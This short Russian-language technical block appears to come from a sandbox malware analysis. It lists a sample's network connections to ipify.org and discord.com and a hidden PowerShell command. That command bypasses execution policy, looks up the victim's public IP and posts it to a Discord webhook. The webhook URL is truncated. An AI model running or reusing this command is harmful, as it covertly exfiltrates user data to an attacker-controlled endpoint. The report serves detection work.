Техническая информация
- %WINDIR%\explorer.exe
- 'ap#.#pify.org':443
- 'di##ord.com':443
- 'ap#.#pify.org':443
- 'di##ord.com':443
- DNS ASK ap#.#pify.org
- DNS ASK di##ord.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command "$i=Invoke-RestMethod -Uri 'https://api.ipify.org';Invoke-RestMethod -Uri 'https://discord.com/api/webhooks/1474102344328151073/e... (со скрытым окном)